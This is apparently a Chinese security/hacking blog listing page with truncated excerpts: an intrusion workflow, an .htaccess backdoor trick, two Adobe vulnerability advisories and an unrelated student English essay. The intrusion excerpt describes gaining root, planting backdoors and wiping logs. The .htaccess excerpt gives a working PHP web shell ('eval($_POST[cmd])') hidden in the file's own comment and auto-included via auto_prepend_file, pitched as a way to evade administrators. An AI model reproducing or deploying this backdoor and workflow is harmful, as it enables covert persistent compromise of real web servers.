对操作系统的认识,对于每一个从事计算行业的人都是非常重要,要成为一名黑客更是要对操作系统有深入、深刻的认识。下面就和大家一起来探讨一下这方面的问题。   我们先来看分析一下一个黑客入侵的基本过程:1、判断入侵对象的操作系统—>2、描扫端口,判断开放了那些服务(这两步有可能同时进行)—>3、跟据操作系统和所开放的服务选择入侵方法,通常有“溢出”和“弱口猜测”两种方法—>4、获得系统的最高权力—>5、安放后门、清除日志走人(也许有格盘走人的)。   由上面可以知道,在整个过程当中对操作系统类型的判断识别是最基本也是很关系的一步。可想而知,如果你连对方的操作系统是什么都不知道,要想入侵跟本无从谈起。   也许很少人问过自己,我们为什么要先了解对方的操作系统呢?其实,我们了解操作系统的原因是因为我们要了解系统内存的工作况态,了解它是以什么方式,基于什么样的技术来控制内存,以及怎么样来处理输入与输出的数据的。世上任何东西都不可能是尽善尽美的(当然这也是我们人类不断追求的动力所在),作为复杂的计算机系统更如此,它在控制内存与处理数据的过程中总是有可能出错的(特别是在安装了其它的应用程序以后),系统本身也会存在各种各样的弱点与不足之处。黑客之所以能够入侵,就是利用了这些弱点与错误。现在网上流行的各种各样的入侵工具,都是黑客在分析了系统的弱点及存在的错之后编写出阅读全文

.htaccess后门   PHP手册,常看常新:) PHP有个特性,会根据apache的httpd.conf和.htaccess来覆盖自己php.ini的设置. 恰好,找到两个邪恶的属性: auto_prepend_file string 指定在主文件之前自动解析的文件名。该文件就像调用了 include() 函数一样被包含进来,因此会使用 include_path。 特殊值 none 禁止了自动前缀。 auto_append_file string 指定在主文件之后自动解析的文件名。该文件就像调用了 include() 函数一样被包含进来,因此会使用 include_path。 特殊值 none 禁止了自动后缀。 Note: 如果脚本通过 exit() 终止,则自动后缀不会发生。 于是很简单,利用.htaccess就能包含文件,并且不用修改任何对方的php文件,同目录下所有php文件就被植入木马了.管理员不注意的话可能就被忽略掉. 本地测试了一下,写了个.htaccess文件到我的sphpblog目录中. #<?php eval($_POST[cmd]);?> php_value auto_prepend_file “.htaccess” 然后随意访问一下sphpblog中的任意文件. 当然直接包含.haccess文件太明显了,上面一对无关和阅读全文

Adobe Form Designer和Form Client多个缓冲区溢出漏洞   受影响系统: Adobe Form Designer/Client 5.0 描述: ——————————————————————————– BUGTRAQ ID: 28210 CVE(CAN) ID: CVE-2007-6253 Adobe Form Designer是Adobe Designer产品家族的成员,用于自动生成表单、捕获并处理数据。 Adobe Form Designer及其客户端提供了多个ActiveX控件,其中FileDlg.dll库所提供的Adobe File Dialog Button控件和SvrCopy.dll库所提供的Adobe Copy to Server对象中存在缓冲区溢出漏洞。如果用户受骗访问了恶意网页的话,就可能触发这些溢出,导致执行任意指令。 <*来源:Will Dormann 链接:http://secunia.com/advisori阅读全文

Adobe ColdFusion多个跨站脚本及无效日志漏洞   受影响系统: Adobe ColdFusion MX 7.02 Adobe ColdFusion MX 7.01 Adobe ColdFusion MX 7.00 Adobe ColdFusion 8 描述: ——————————————————————————– BUGTRAQ ID: 28205,28207 CVE(CAN) ID: CVE-2008-0643,CVE-2008-0644,CVE-2008-1203 ColdFusion MX是一款高效的网络应用服务器开发环境,具有很高的易用性和开发效率,基于标准的Java技术,可以与XML、Web Services和Microsoft.NET环境相集成。 如果ColdFusion应用的Application.cfm或Application.cfc包含有setEncoding函数的话,远程攻击者就可以通过提交恶意请求执行跨站脚本攻击。 ColdFu阅读全文

任课教师:任一涛 20041050098 两题任选一个 1. One day life at campus 2. An interesting thing I remenbered at compus 我选择了第2题,得分91。 An interesting thing I remembered at campus         The interesting thing I remebered at campus is wathcing “The Lord of the Ring”.         It was happened when I was in the grade One in the college. I was a new student in the campus. I was curious about everything. New man needn’t to do many things, so I always had a lot of sapre time. Occasionally, I saw a notice said the movie “The lord of the Ring” has being shown at every sunday night from 19:00 阅读全文